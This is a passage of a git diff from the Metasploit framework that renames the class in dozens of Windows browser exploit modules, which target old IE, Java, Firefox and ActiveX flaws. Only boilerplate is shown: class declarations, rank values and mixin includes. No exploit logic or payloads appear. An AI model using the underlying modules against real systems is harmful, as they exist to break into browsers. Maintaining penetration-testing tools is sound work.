a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb +++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/intrust_annotatex_add.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb index 9456b7d5b6..3f626ef961 100644 --- a/modules/exploits/windows/browser/intrust_annotatex_add.rb +++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_basicservice_impl.rb b/modules/exploits/windows/browser/java_basicservice_impl.rb index 3e75330b62..dce454f29d 100644 --- a/modules/exploits/windows/browser/java_basicservice_impl.rb +++ b/modules/exploits/windows/browser/java_basicservice_impl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/browser/java_cmm.rb b/modules/exploits/windows/browser/java_cmm.rb index 7ca72c586c..dd6140d2f9 100644 --- a/modules/exploits/windows/browser/java_cmm.rb +++ b/modules/exploits/windows/browser/java_cmm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb index cc88830088..1d3e0e9eea 100644 --- a/modules/exploits/windows/browser/java_codebase_trust.rb +++ b/modules/exploits/windows/browser/java_codebase_trust.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_docbase_bof.rb b/modules/exploits/windows/browser/java_docbase_bof.rb index 52425ef4c4..c8a8cbcec7 100644 --- a/modules/exploits/windows/browser/java_docbase_bof.rb +++ b/modules/exploits/windows/browser/java_docbase_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/java_mixer_sequencer.rb b/modules/exploits/windows/browser/java_mixer_sequencer.rb index d6c31e3ecb..5817b6720e 100644 --- a/modules/exploits/windows/browser/java_mixer_sequencer.rb +++ b/modules/exploits/windows/browser/java_mixer_sequencer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb index bed81f6b2e..063a6aef3d 100644 --- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb +++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/java_ws_double_quote.rb b/modules/exploits/windows/browser/java_ws_double_quote.rb index f57b207b6d..87ac933b9f 100644 --- a/modules/exploits/windows/browser/java_ws_double_quote.rb +++ b/modules/exploits/windows/browser/java_ws_double_quote.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb index e832ba3f89..74323a296a 100644 --- a/modules/exploits/windows/browser/java_ws_vmargs.rb +++ b/modules/exploits/windows/browser/java_ws_vmargs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb index c72124cf60..12a30108ab 100644 --- a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb +++ b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index c6cce237eb..04f1329b5c 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb index 4502c63b37..601a07fd74 100644 --- a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb +++ b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb index 4397a6b09a..96f993ef29 100644 --- a/modules/exploits/windows/browser/logitechvideocall_start.rb +++ b/modules/exploits/windows/browser/logitechvideocall_start.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb index 4f9d33b47f..9dd79abcbb 100644 --- a/modules/exploits/windows/browser/lpviewer_url.rb +++ b/modules/exploits/windows/browser/lpviewer_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb index d3a8fb15d1..038cb41bda 100644 --- a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb +++ b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index dc41c99c65..c15b5dcd61 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/malwarebytes_update_exec.rb b/modules/exploits/windows/browser/malwarebytes_update_exec.rb index db740e9bdd..7714407a8c 100644 --- a/modules/exploits/windows/browser/malwarebytes_update_exec.rb +++ b/modules/exploits/windows/browser/malwarebytes_update_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # Would be Great except MBAE doesn't version check include Msf::Exploit::EXE diff --git a/modules/exploits/windows/browser/maxthon_history_xcs.rb b/modules/exploits/windows/browser/maxthon_history_xcs.rb index 89d894554c..f501d3b651 100644 --- a/modules/exploits/windows/browser/maxthon_history_xcs.rb +++ b/modules/exploits/windows/browser/maxthon_history_xcs.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb index ff4cf01a15..0bd3a05ebf 100644 --- a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb +++ b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafee_mvt_exec.rb b/modules/exploits/windows/browser/mcafee_mvt_exec.rb index 2d39cac1ad..eca4fd4e7d 100644 --- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb +++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index 525a9b842d..9828cf2c15 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mirc_irc_url.rb b/modules/exploits/windows/browser/mirc_irc_url.rb index e5ab64c876..e8877e1ed5 100644 --- a/modules/exploits/windows/browser/mirc_irc_url.rb +++ b/modules/exploits/windows/browser/mirc_irc_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb index 7cba8400bc..e431231c46 100644 --- a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb +++ b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb index 06ef17e639..635d5fc3be 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb b/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb index ac509c6e3d..3af07119d9 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb index 509d30f471..be9b94bf4a 100644 --- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb +++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index 6f5fcddffe..351ab5261d 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb index 287360a20a..6b09d042d0 100644 --- a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb +++ b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_nstreerange.rb b/modules/exploits/windows/browser/mozilla_nstreerange.rb index 496bbf0123..46ba71e46e 100644 --- a/modules/exploits/windows/browser/mozilla_nstreerange.rb +++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb index 7f378c62e7..2a78db1bb5 100644 --- a/modules/exploits/windows/browser/mozilla_reduceright.rb +++ b/modules/exploits/windows/browser/mozilla_reduceright.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index 068a4c1a46..afe4d9aa3e 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms05_054_onload.rb b/modules/exploits/windows/browser/ms05_054_onload.rb index 300685a93e..9027e3b800 100644 --- a/modules/exploits/windows/browser/ms05_054_onload.rb +++ b/modules/exploits/windows/browser/ms05_054_onload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb index 65f8e87a6b..56b3424194 100644 --- a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb +++ b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index 8a7966917d..a2f3bf5b41 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb index bf5f1f7495..ec0c79bc03 100644 --- a/modules/exploits/windows/browser/ms06_055_vml_method.rb +++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb index 16b12abc37..958c1649d1 100644 --- a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb +++ b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_067_keyframe.rb b/modules/exploits/windows/browser/ms06_067_keyframe.rb index 775de5a215..fe0e20f400 100644 --- a/modules/exploits/windows/browser/ms06_067_keyframe.rb +++ b/modules/exploits/windows/browser/ms06_067_keyframe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/ms06_071_xml_core.rb b/modules/exploits/windows/browser/ms06_071_xml_core.rb index 98c92b6610..533beb1042 100644 --- a/modules/exploits/windows/browser/ms06_071_xml_core.rb +++ b/modules/exploits/windows/browser/ms06_071_xml_core.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb index ebe1eb2403..812cd9d774 100644 --- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb index b53071abb3..09f40510e4 100644 --- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb +++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb index fc5f2e8ab7..e069312a05 100644 --- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb +++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb index 8834323960..bddfbd2985 100644 --- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb +++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb index 9d941bb40b..d1bb4018fe 100644 --- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb +++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb index 3f2dc970a4..fb953019b4 100644 --- a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb +++ b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb index 4c883ed1f3..5d223c0b62 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb index 548fc18a29..8bef321090 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_072_style_object.rb b/modules/exploits/windows/browser/ms09_072_style_object.rb index e31cd4d028..db5edffd29 100644 --- a/modules/exploits/windows/browser/ms09_072_style_object.rb +++ b/modules/exploits/windows/browser/ms09_072_style_object.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_002_aurora.rb b/modules/exploits/windows/browser/ms10_002_aurora.rb index bb682e0e02..41e2c4b8f7 100644 --- a/modules/exploits/windows/browser/ms10_002_aurora.rb +++ b/modules/exploits/windows/browser/ms10_002_aurora.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_002_ie_object.rb b/modules/exploits/windows/browser/ms10_002_ie_object.rb index 5ba8df594e..c8c48f817f 100644 --- a/modules/exploits/windows/browser/ms10_002_ie_object.rb +++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb index 38abad66ba..3bc77c655b 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb index ef07915e4a..205ab89161 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb index 497cd2818f..097cae4618 100644 --- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb +++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb index f6283f3c4d..a0d8c78154 100644 --- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb +++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb index 3b272637f1..d6f2f8e684 100644 --- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb +++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb index 76165d8a84..5e71f5dabc 100644 --- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb index 74898d9b7d..fa32a72eb7 100644 --- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index cbb1e33a3e..00a7558b92 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # Need more love for Great include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb index 037424e5c5..8d6ebad0b1 100644 --- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb +++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_081_option.rb b/modules/exploits/windows/browser/ms11_081_option.rb index 51c62c2f9b..b31eaf3ef2 100644 --- a/modules/exploits/windows/browser/ms11_081_option.rb +++ b/modules/exploits/windows/browser/ms11_081_option.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_093_ole32.rb b/modules/exploits/windows/browser/ms11_093_ole32.rb index ce333b7c93..b382a1498c 100644 --- a/modules/exploits/windows/browser/ms11_093_ole32.rb +++ b/modules/exploits/windows/browser/ms11_093_ole32.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb 